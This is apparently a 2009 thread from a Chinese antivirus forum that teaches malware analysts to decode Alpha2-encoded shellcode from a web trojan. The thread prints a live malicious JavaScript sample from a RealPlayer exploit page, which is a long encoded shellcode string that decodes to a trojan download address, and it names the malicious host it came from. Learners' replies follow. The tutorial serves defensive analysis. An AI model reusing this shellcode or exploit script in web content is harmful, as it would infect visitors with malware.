网马解密大讲堂——网马解密中级篇(Alpha2篇) bbs.ikaka.com

networkedition - 2009-5-18 13:08:00

卡卡讲堂之网马解密初级篇
卡卡讲堂之网马解密中级篇
卡卡讲堂之网马解密高级篇(swf网马解密)
卡卡讲堂之网马解密高级篇(pdf网马解密)
1.Freshow解密工具的详细用法；
2.网马解密之——Eval篇；
3.网马解密之——Document.write篇；
4.网马解密之——Alpha2篇；
5.网马解密之——Shellcode篇；
6.网马解密之——Base64篇；
7.网马解密之——US-ASCII篇；
8.浅谈eval解密之——工具篇

引用:

Alpha2是Realplay漏洞多采用此加密方式，该加密方式特征：

代码开头：TYIIIIIIIIIIIIIIII；

一般情况下在网马解密过程中，在获取的恶意网址源代码中，代码开头有上述类似代码，使用得加密方式即为alpha2。

下面我们将结合实例讲解alpha2解密方法，我们先来看一个典型的alpha2加密的网马代码：

[复制到剪贴板]

CODE:

var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp";

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

networkedition - 2009-5-18 13:08:00

我们将上述代码，复制粘贴至freshow的上操作区域，相见下列截图：

http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码，由于恶意网址的时效性，这个恶意网址已经失效，我将此js脚本源代码已保存，直接使用源代码来讲解，并不影响我们的讲解。

networkedition - 2009-5-18 13:09:00

接下来我们要将此代码处理一下，去掉没有用的部分。相见下列截图：

大的红色框里内容为处理后源代码，实际就是将shellcode部分保留，删除其余无效代码内容。

networkedition - 2009-5-18 13:09:00

接下来我们选择解密选项为alpha2，点击decode进行一次解密，解密后内容会显示在下操作区域，点击up按钮将下操作区域代码上翻至上操作区域，进行二次解密，解密选项选择esc，点击decode进行二次解密，获得网马下载地址，请见下列截图：

networkedition - 2009-5-18 13:24:00

happysunday2003 - 2009-5-19 23:21:00

继续努力

於陵闲云 - 2009-5-21 12:52:00

这么好的文章没有人顶:kaka12:

Bearboy - 2009-5-28 19:23:00

上课坐后排

jhh28 - 2009-6-27 15:41:00

学习了,以前是一知半懂,现在才明白

GeorgeChen - 2009-6-29 15:10:00

Realplay的漏洞现在比较少见了，大部分挂马的都使用Flash漏洞了。

辛达星郁 - 2009-6-30 19:30:00

努力学习中
:kaka12:

gtyre2 - 2009-7-2 16:24:00

这个挺多见得

kav2046 - 2009-7-17 20:54:00

好文章！长见识！感谢楼主分享！:kaka12:

地区性 - 2009-7-20 16:56:00

为什么还要把没有用的去掉啊

我没去掉，也解出来了

redbsd - 2009-8-20 15:00:00

很强大啊，谢谢。

suanxuejing - 2010-3-9 21:03:00

居然解不出来，郁闷啊

suanxuejing - 2010-3-9 21:03:00

检查了两次

suanxuejing - 2010-3-9 21:05:00

居然，什么都没有去掉，解出来了，晕了啊

筠林碧湫 - 2010-3-11 21:32:00

练习的时候还没有碰到这种加密的不过熟能生巧了解更多知识在解其他的网马时也用到

无极御鳞 - 2010-5-10 22:08:00

学习了..

springyun - 2010-5-22 13:46:00

继续学习

dongsmqs - 2010-6-6 1:01:00

[quote] 原帖由 networkedition 于 2009-5-18 13:09:00 发表
接下来我们选择解密选项为alpha2，点击decode进行一次解密，解密后内容会显示在下操作区域，点击up按钮将下操作区域代码上翻至上操作区域，进行二次解密，解密选项选择esc，点击decode进行二次解密，获得网马下载地址。。。。。。

为什么我做的不一样？请看图：

再后面就更糊涂了。。。。。。

出不来网址，错在那了？？？

dongsmqs - 2010-6-6 1:14:00

引用:

原帖由 dongsmqs 于 2010-6-6 1:01:00 发表
[quote] 原帖由 networkedition 于 2009-5-18 13:09:00 发表
接下来我们选择解密选项为alpha2，点击decode进行一次解密，解密后内容会显示在下操作区域，点击up按钮将下操作区域代码上翻至上操作区域，进行二次解密，解密选项选择esc，点击decode进行二次解密，获得网马下载地址。。。。。。

为什么我做的不一样？请看图：

[

俺会了，原来是要替换成空格，呵呵，开始还真搞不懂哦！

鹰丶风少 - 2010-7-28 12:14:00

又看完一个:kaka9:

瑞星卡卡安全论坛